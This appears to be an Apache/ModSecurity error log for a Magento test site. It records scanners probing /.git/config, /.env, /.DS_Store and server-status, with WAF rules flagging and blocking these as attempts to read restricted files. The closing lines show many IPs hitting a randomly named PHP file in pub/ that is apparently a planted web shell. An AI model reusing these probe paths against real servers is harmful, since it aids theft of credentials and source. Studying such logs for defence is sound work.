[Fri Nov 21 04:32:44.964430 2025] [:error] [pid 223952] [client 207.154.197.113:56716] [client 207.154.197.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aR_dXJIgILTHWk6gdY_zJgAAAAA"]
[Fri Nov 21 04:32:44.964581 2025] [:error] [pid 223952] [client 207.154.197.113:56716] [client 207.154.197.113] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aR_dXJIgILTHWk6gdY_zJgAAAAA"]
[Sat Nov 22 11:36:37.649290 2025] [authz_core:error] [pid 245725] [client 64.225.75.246:48236] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 22 11:36:38.031632 2025] [:error] [pid 245724] [client 64.225.75.246:48262] [client 64.225.75.246] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSGSNkNCpolHJUMwqCOeYQAAAAA"]
[Sat Nov 22 11:36:38.031871 2025] [:error] [pid 245724] [client 64.225.75.246:48262] [client 64.225.75.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSGSNkNCpolHJUMwqCOeYQAAAAA"]
[Sat Nov 22 11:36:38.032044 2025] [:error] [pid 245724] [client 64.225.75.246:48262] [client 64.225.75.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSGSNkNCpolHJUMwqCOeYQAAAAA"]
[Sat Nov 22 11:36:38.165949 2025] [:error] [pid 246152] [client 64.225.75.246:48272] [client 64.225.75.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSGSNtxUU-Hw4pQkel90RQAAAAg"]
[Sat Nov 22 11:36:38.166175 2025] [:error] [pid 246152] [client 64.225.75.246:48272] [client 64.225.75.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSGSNtxUU-Hw4pQkel90RQAAAAg"]
[Sat Nov 22 11:36:38.166350 2025] [:error] [pid 246152] [client 64.225.75.246:48272] [client 64.225.75.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSGSNtxUU-Hw4pQkel90RQAAAAg"]
[Sat Nov 22 11:36:38.285455 2025] [:error] [pid 254081] [client 64.225.75.246:48286] [client 64.225.75.246] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSGSNv8cXoP-AWZrT1wn0AAAAAI"]
[Sat Nov 22 11:36:38.285684 2025] [:error] [pid 254081] [client 64.225.75.246:48286] [client 64.225.75.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSGSNv8cXoP-AWZrT1wn0AAAAAI"]
[Sat Nov 22 11:36:38.285851 2025] [:error] [pid 254081] [client 64.225.75.246:48286] [client 64.225.75.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSGSNv8cXoP-AWZrT1wn0AAAAAI"]
[Sat Nov 22 11:59:08.450666 2025] [authz_core:error] [pid 245727] [client 68.183.180.73:55268] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 22 11:59:11.578752 2025] [:error] [pid 250889] [client 68.183.180.73:55286] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSGXf9fDR3gsWzr2TsEDVAAAAAo"]
[Sat Nov 22 11:59:11.578987 2025] [:error] [pid 250889] [client 68.183.180.73:55286] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSGXf9fDR3gsWzr2TsEDVAAAAAo"]
[Sat Nov 22 11:59:11.579161 2025] [:error] [pid 250889] [client 68.183.180.73:55286] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSGXf9fDR3gsWzr2TsEDVAAAAAo"]
[Sat Nov 22 11:59:12.587888 2025] [:error] [pid 248051] [client 68.183.180.73:55294] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSGXgBHsbcWMkRqo3BS5hAAAAAk"]
[Sat Nov 22 11:59:12.588305 2025] [:error] [pid 248051] [client 68.183.180.73:55294] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSGXgBHsbcWMkRqo3BS5hAAAAAk"]
[Sat Nov 22 11:59:12.588583 2025] [:error] [pid 248051] [client 68.183.180.73:55294] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSGXgBHsbcWMkRqo3BS5hAAAAAk"]
[Sat Nov 22 11:59:13.597902 2025] [:error] [pid 254082] [client 68.183.180.73:55298] [client 68.183.180.73] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSGXgQf60x2qmsyFVX_P9AAAAAs"]
[Sat Nov 22 11:59:13.598133 2025] [:error] [pid 254082] [client 68.183.180.73:55298] [client 68.183.180.73] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSGXgQf60x2qmsyFVX_P9AAAAAs"]
[Sat Nov 22 11:59:13.598312 2025] [:error] [pid 254082] [client 68.183.180.73:55298] [client 68.183.180.73] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSGXgQf60x2qmsyFVX_P9AAAAAs"]
[Sat Nov 22 20:25:04.279409 2025] [authz_core:error] [pid 250889] [client 146.190.242.161:58400] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 22 20:25:05.321465 2025] [:error] [pid 254081] [client 146.190.242.161:58428] [client 146.190.242.161] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSIOEf8cXoP-AWZrT1wqDwAAAAI"]
[Sat Nov 22 20:25:05.321695 2025] [:error] [pid 254081] [client 146.190.242.161:58428] [client 146.190.242.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSIOEf8cXoP-AWZrT1wqDwAAAAI"]
[Sat Nov 22 20:25:05.321879 2025] [:error] [pid 254081] [client 146.190.242.161:58428] [client 146.190.242.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aSIOEf8cXoP-AWZrT1wqDwAAAAI"]
[Sat Nov 22 20:25:05.661638 2025] [:error] [pid 245731] [client 146.190.242.161:58438] [client 146.190.242.161] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSIOEeyC1YwvqVRI1UC0awAAAAU"]
[Sat Nov 22 20:25:05.661870 2025] [:error] [pid 245731] [client 146.190.242.161:58438] [client 146.190.242.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSIOEeyC1YwvqVRI1UC0awAAAAU"]
[Sat Nov 22 20:25:05.662056 2025] [:error] [pid 245731] [client 146.190.242.161:58438] [client 146.190.242.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSIOEeyC1YwvqVRI1UC0awAAAAU"]
[Sat Nov 22 20:25:06.001456 2025] [:error] [pid 254082] [client 146.190.242.161:58450] [client 146.190.242.161] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSIOEgf60x2qmsyFVX_RWAAAAAs"]
[Sat Nov 22 20:25:06.001697 2025] [:error] [pid 254082] [client 146.190.242.161:58450] [client 146.190.242.161] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSIOEgf60x2qmsyFVX_RWAAAAAs"]
[Sat Nov 22 20:25:06.001915 2025] [:error] [pid 254082] [client 146.190.242.161:58450] [client 146.190.242.161] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSIOEgf60x2qmsyFVX_RWAAAAAs"]
[Sat Nov 22 23:05:43.224039 2025] [authz_core:error] [pid 260404] [client 207.154.212.47:44830] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Nov 22 23:05:47.279266 2025] [:error] [pid 260411] [client 207.154.212.47:44854] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSIzu6Xzexh0F5me0gI27QAAAAQ"]
[Sat Nov 22 23:05:47.279498 2025] [:error] [pid 260411] [client 207.154.212.47:44854] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSIzu6Xzexh0F5me0gI27QAAAAQ"]
[Sat Nov 22 23:05:47.279696 2025] [:error] [pid 260411] [client 207.154.212.47:44854] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aSIzu6Xzexh0F5me0gI27QAAAAQ"]
[Sat Nov 22 23:05:48.532835 2025] [:error] [pid 254083] [client 207.154.212.47:44858] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSIzvJZRiCT8Of7H0KaBQQAAAAw"]
[Sat Nov 22 23:05:48.533088 2025] [:error] [pid 254083] [client 207.154.212.47:44858] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSIzvJZRiCT8Of7H0KaBQQAAAAw"]
[Sat Nov 22 23:05:48.533267 2025] [:error] [pid 254083] [client 207.154.212.47:44858] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aSIzvJZRiCT8Of7H0KaBQQAAAAw"]
[Sat Nov 22 23:05:49.487268 2025] [:error] [pid 250889] [client 207.154.212.47:44866] [client 207.154.212.47] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSIzvdfDR3gsWzr2TsEPEgAAAAo"]
[Sat Nov 22 23:05:49.487545 2025] [:error] [pid 250889] [client 207.154.212.47:44866] [client 207.154.212.47] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSIzvdfDR3gsWzr2TsEPEgAAAAo"]
[Sat Nov 22 23:05:49.487745 2025] [:error] [pid 250889] [client 207.154.212.47:44866] [client 207.154.212.47] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aSIzvdfDR3gsWzr2TsEPEgAAAAo"]
[Sun Nov 23 00:21:02.730517 2025] [autoindex:error] [pid 264147] [client 93.71.103.137:60265] AH01276: Cannot serve directory /var/www/magento.test.indacotrentino.com/www/pub/errors/: No matching DirectoryIndex (index.php) found, and server-generated directory index forbidden by Options directive, referer: https://economiasolidale.test.indacotrentino.com/errors
[Sun Nov 23 00:21:04.600639 2025] [php:warn] [pid 264144] [client 149.102.237.53:55237] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Sun Nov 23 00:21:05.047069 2025] [authz_core:error] [pid 264145] [client 46.246.122.37:1870] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Nov 23 00:21:05.205136 2025] [authz_core:error] [pid 264142] [client 149.22.91.137:45641] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Nov 23 00:21:05.879484 2025] [php:warn] [pid 263848] [client 217.170.194.172:41715] PHP Warning: Undefined array key "d" in /var/www/magento.test.indacotrentino.com/www/pub/bcf93fbb4020.php on line 1
[Sun Nov 23 00:21:06.333976 2025] [authz_core:error] [pid 263849] [client 91.98.27.203:36979] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/.htaccess
[Sun Nov 23 00:21:10.094259 2025] [authz_core:error] [pid 264142] [client 2.57.170.237:32793] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/pub/cron.php
